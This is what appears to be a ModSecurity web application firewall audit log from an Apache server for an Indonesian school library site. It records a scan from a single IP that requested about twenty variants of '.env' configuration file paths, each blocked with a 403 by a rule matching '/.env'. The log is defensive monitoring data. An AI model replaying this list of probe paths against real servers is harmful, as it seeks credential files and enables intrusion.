Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad11e36-Z-- --69b3ee50-A-- [04/Jun/2025:06:13:59 +0700] aD-Bt5LmnxTwEPX7IubOwQAAAIM 103.236.140.4 43960 103.236.140.4 8181 --69b3ee50-B-- GET /.env.example.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603442 --69b3ee50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --69b3ee50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992439503142 839 (- - -) Stopwatch2: 1748992439503142 839; combined=337, p1=296, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69b3ee50-Z-- --41ab7b73-A-- [04/Jun/2025:06:14:00 +0700] aD-BuDNXNn6zAsHj7JAXKQAAAFU 103.236.140.4 43964 103.236.140.4 8181 --41ab7b73-B-- GET /.env.inc.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521316 --41ab7b73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --41ab7b73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992440348590 665 (- - -) Stopwatch2: 1748992440348590 665; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41ab7b73-Z-- --99b6df53-A-- [04/Jun/2025:06:14:03 +0700] aD-Bu5LmnxTwEPX7IubOwgAAAIQ 103.236.140.4 43968 103.236.140.4 8181 --99b6df53-B-- GET /.env.local.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603445 --99b6df53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --99b6df53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992443236185 840 (- - -) Stopwatch2: 1748992443236185 840; combined=335, p1=293, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b6df53-Z-- --0e405261-A-- [04/Jun/2025:06:14:04 +0700] aD-BvF_DvM40jZomokt-GQAAABI 103.236.140.4 43972 103.236.140.4 8181 --0e405261-B-- GET /.env.old.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521319 --0e405261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0e405261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992444881561 817 (- - -) Stopwatch2: 1748992444881561 817; combined=328, p1=290, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e405261-Z-- --e046d905-A-- [04/Jun/2025:06:14:16 +0700] aD-ByNhPZJx8OfNaLCowlgAAAM4 103.236.140.4 43976 103.236.140.4 8181 --e046d905-B-- GET /.env.orig.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603448 --e046d905-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e046d905-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992456742934 936 (- - -) Stopwatch2: 1748992456742934 936; combined=399, p1=357, p2=0, p3=0, p4=0, p5=42, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e046d905-Z-- --3f8eb336-A-- [04/Jun/2025:06:14:19 +0700] aD-By1_DvM40jZomokt-GgAAABE 103.236.140.4 43980 103.236.140.4 8181 --3f8eb336-B-- GET /.env.original.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603451 --3f8eb336-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3f8eb336-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992459883476 867 (- - -) Stopwatch2: 1748992459883476 867; combined=383, p1=345, p2=0, p3=0, p4=0, p5=38, sr=146, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f8eb336-Z-- --d5b58f06-A-- [04/Jun/2025:06:14:27 +0700] aD-B01_DvM40jZomokt-GwAAABY 103.236.140.4 43984 103.236.140.4 8181 --d5b58f06-B-- GET /.env.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521322 --d5b58f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d5b58f06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992467040914 689 (- - -) Stopwatch2: 1748992467040914 689; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5b58f06-Z-- --d197c355-A-- [04/Jun/2025:06:14:28 +0700] aD-B1NhPZJx8OfNaLCowlwAAANE 103.236.140.4 43988 103.236.140.4 8181 --d197c355-B-- GET /.env.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603454 --d197c355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d197c355-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992468282449 644 (- - -) Stopwatch2: 1748992468282449 644; combined=254, p1=220, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d197c355-Z-- --6bb05b3a-A-- [04/Jun/2025:06:14:28 +0700] aD-B1F_DvM40jZomokt-HAAAABU 103.236.140.4 43992 103.236.140.4 8181 --6bb05b3a-B-- GET /.env.php.dist HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521325 --6bb05b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6bb05b3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992468963842 690 (- - -) Stopwatch2: 1748992468963842 690; combined=293, p1=245, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bb05b3a-Z-- --af4acc75-A-- [04/Jun/2025:06:14:33 +0700] aD-B2dhPZJx8OfNaLCowmQAAANM 103.236.140.4 43996 103.236.140.4 8181 --af4acc75-B-- GET /.env.php.swm HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521328 --af4acc75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --af4acc75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992473734872 770 (- - -) Stopwatch2: 1748992473734872 770; combined=386, p1=348, p2=0, p3=0, p4=0, p5=37, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af4acc75-Z-- --ac807b39-A-- [04/Jun/2025:06:14:37 +0700] aD-B3ZLmnxTwEPX7IubOwwAAAIY 103.236.140.4 44002 103.236.140.4 8181 --ac807b39-B-- GET /.env.prod.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521331 --ac807b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac807b39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992477625960 739 (- - -) Stopwatch2: 1748992477625960 739; combined=302, p1=268, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac807b39-Z-- --883e2c46-A-- [04/Jun/2025:06:14:38 +0700] aD-B3pLmnxTwEPX7IubOxAAAAIk 103.236.140.4 44006 103.236.140.4 8181 --883e2c46-B-- GET /.env.production.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603460 --883e2c46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --883e2c46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992478933666 905 (- - -) Stopwatch2: 1748992478933666 905; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --883e2c46-Z-- --f86e3676-A-- [04/Jun/2025:06:14:39 +0700] aD-B35LmnxTwEPX7IubOxQAAAIg 103.236.140.4 44010 103.236.140.4 8181 --f86e3676-B-- GET /.env.public.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521334 --f86e3676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f86e3676-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992479622107 689 (- - -) Stopwatch2: 1748992479622107 689; combined=271, p1=238, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f86e3676-Z-- --39251d3a-A-- [04/Jun/2025:06:14:42 +0700] aD-B4l_DvM40jZomokt-HQAAABg 103.236.140.4 44014 103.236.140.4 8181 --39251d3a-B-- GET /.env.qa.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603463 --39251d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39251d3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992482282030 728 (- - -) Stopwatch2: 1748992482282030 728; combined=291, p1=254, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39251d3a-Z-- --c34f9408-A-- [04/Jun/2025:06:14:46 +0700] aD-B5thPZJx8OfNaLCowmgAAANY 103.236.140.4 44018 103.236.140.4 8181 --c34f9408-B-- GET /.env.sample.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603466 --c34f9408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c34f9408-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992486252666 942 (- - -) Stopwatch2: 1748992486252666 942; combined=367, p1=327, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c34f9408-Z-- --bf645f59-A-- [04/Jun/2025:06:14:50 +0700] aD-B6thPZJx8OfNaLCowmwAAANc 103.236.140.4 44022 103.236.140.4 8181 --bf645f59-B-- GET /.env.save.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603469 --bf645f59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf645f59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992490761426 786 (- - -) Stopwatch2: 1748992490761426 786; combined=322, p1=285, p2=0, p3=0, p4=0, p5=36, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf645f59-Z-- --0219556d-A-- [04/Jun/2025:06:15:04 +0700] aD-B-DNXNn6zAsHj7JAXKgAAAFc 103.236.140.4 44026 103.236.140.4 8181 --0219556d-B-- GET /.env.stag.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521337 --0219556d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0219556d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992504458864 908 (- - -) Stopwatch2: 1748992504458864 908; combined=374, p1=334, p2=0, p3=0, p4=0, p5=40, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0219556d-Z-- --0ad22b67-A-- [04/Jun/2025:06:15:10 +0700] aD-B_thPZJx8OfNaLCownAAAAMA 103.236.140.4 44030 103.236.140.4 8181 --0ad22b67-B-- GET /.env.stage.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603472 --0ad22b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ad22b67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992510284195 795 (- - -) Stopwatch2: 1748992510284195 795; combined=302, p1=262, p2=0, p3=0, p4=0, p5=39, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
